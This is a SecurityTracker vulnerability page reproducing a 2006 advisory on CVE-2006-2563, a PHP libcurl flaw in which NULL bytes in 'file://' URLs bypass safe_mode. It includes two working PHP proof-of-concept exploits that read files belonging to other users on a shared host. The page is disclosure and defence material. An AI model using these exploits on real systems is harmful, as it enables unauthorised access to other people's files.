SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP libcurl Bug in Processing 'file://' URLs Containing NULL Characters Lets Users Bypass Safe Mode Restrictions
SecurityTracker Alert ID:  1016175
SecurityTracker URL:  http://securitytracker.com/id/1016175
CVE Reference:   CVE-2006-2563   (Links to External Site)
Date:  May 30 2006
Impact:   Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.4.2 and 5.1.4
Description:   A vulnerability was reported in PHP libcurl. A user may be able to bypass safe mode restrictions.

A user that can create PHP on the target system or affect data passed to a PHP script may be able to pass a specially crafted URL to bypass PHP safe_mode security checks and include files from the script's directory.

The flaw can be triggered by 'file://' URLs that contain NULL characters.

The vulnerability resides in 'ext/curl/interface.c'.

Maksymilian Arciemowicz of SecurityReason.com reported this vulnerability.

The original advisory is available at:

http://securityreason.com/news/0/0x18

Impact:   A user may be able to cause the affected script to include unintended files.
Solution:   The vendor has issued a fix, available via CVS.
Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  26 May 2006 23:24:51 -0000
Subject:  cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 15.5.2006
- -Public: 27.5.2006
from SECURITYREASON.COM
CVE-2006-2563

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific
 features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also,
 much of the PHP Conference Material is freely available. 

The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this
 problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially
 ISP's, use safe mode for now.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of
 servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and
 ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp
 extension), HTTP form based upload, proxies, cookies, and user+password authentication.
These functions have been added in PHP 4.0.2. 

- --- 1. Safe Mode Bypass in cURL---
General problem exists in cURL functions, because are changed safe_mode, strings 0 (\x00) are change to "_". Next bug exists in prefix
 file://, becaluse safe_mode checks only path at file:///. 

Example:
- -Safe_Mode bypass exploit.1---
<?
$ch = curl_init("file://filethatyoudonthaveaccessto.php\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
- -Safe_Mode bypass exploit.1---

Safe_mode checks only access only to __FILE__. But cURL include filethatyoudonthaveaccessto.php. So you can include any files from
 directory where script is.
But in this exploit, you can only read files from directory where is this script. You can't use "/".

There is another conception for an exploit: if you have an access to a directory (rights) where you want to read files. So, if you
 want to include files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php",
you should make a dir like
"/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":

- -Safe_Mode bypass exploit.2---
<?
$ch = curl_init("file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
- -Safe_Mode bypass exploit.2---

Safe mode checks access to file
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php"

And cURL include only 
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"

because \x00 are ending path to file.

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/

- --- 3. Greets ---

For: sp3x
and
p_e_a, l5x, Infospec, pi3, eax

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEd4bS3Ke13X/fTO4RAsCvAJ9eTxATfJRZZ2/DEoinl4R3Y+DZgACgvHQk
v8npsbXGJqmJRiAT9lnCyv8=
=mI80
-----END PGP SIGNATURE-----

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC